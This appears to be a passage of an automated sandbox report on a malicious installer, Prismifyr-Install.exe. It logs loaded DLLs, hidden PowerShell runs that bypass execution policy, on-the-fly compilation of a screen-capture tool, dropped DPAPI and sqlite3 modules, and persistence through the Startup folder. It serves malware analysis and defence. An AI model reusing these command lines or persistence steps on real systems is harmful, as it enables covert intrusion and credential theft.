      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: mscoree.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: edgegdi.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeSection loaded: windowscodecs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: dbghelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: edgegdi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: powrprof.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: umpdc.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: mswsock.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: napinsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: pnrpnsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: wshbth.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: nlaapi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: winrnr.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: dhcpcsvc.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
      Source: C:\Windows\System32\mshta.exeAutomated click: OK
      Source: C:\Windows\System32\mshta.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Prismifyr-Install.exeStatic PE information: More than 8191 > 100 exports found
      Source: Prismifyr-Install.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: Prismifyr-Install.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: Prismifyr-Install.exeStatic file information: File size 63862037 > 1048576
      Source: Prismifyr-Install.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12aa000
      Source: Prismifyr-Install.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfe5c00
      Source: Prismifyr-Install.exeStatic PE information: More than 200 imports for KERNEL32.dll
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: Prismifyr-Install.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Prismifyr-Install.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.pdbhP source: powershell.exe, 00000004.00000002.67568805952.0000026AE5A4C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb\ source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E44CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.24e0b2b2d51e47b9dba34c30\node\out\Release\node.pdb source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E44CB000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.pdb source: powershell.exe, 00000004.00000002.67568805952.0000026AE5A4C000.00000004.00000800.00020000.00000000.sdmp
      Source: Prismifyr-Install.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: Prismifyr-Install.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: Prismifyr-Install.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: Prismifyr-Install.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: Prismifyr-Install.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
      Source: Prismifyr-Install.exeStatic PE information: section name: _RDATA
      Source: Prismifyr-Install.exe.0.drStatic PE information: section name: _RDATA
      Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
      Source: node.napi.node.0.drStatic PE information: section name: _RDATA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFEC6D50AF1 pushad ; ret 4_2_00007FFEC6D50AF2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFEC6D500BD pushad ; iretd 4_2_00007FFEC6D500C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFEC6D500BD pushad ; iretd 25_2_00007FFEC6D500C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFEC6D600BD pushad ; iretd 27_2_00007FFEC6D600C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFEC6D62A27 pushad ; ret 27_2_00007FFEC6D62A31
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeCode function: 34_2_00007FFEC6D400BD pushad ; iretd 34_2_00007FFEC6D400C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFEC6D400BD pushad ; iretd 44_2_00007FFEC6D400C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFEC6D419D2 push eax; retf 002Fh44_2_00007FFEC6D419E9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFEC6E106C7 pushad ; retn 0029h44_2_00007FFEC6E106D2
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.dllJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mydyhibp.dllJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJump to dropped file
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeJump to behavior
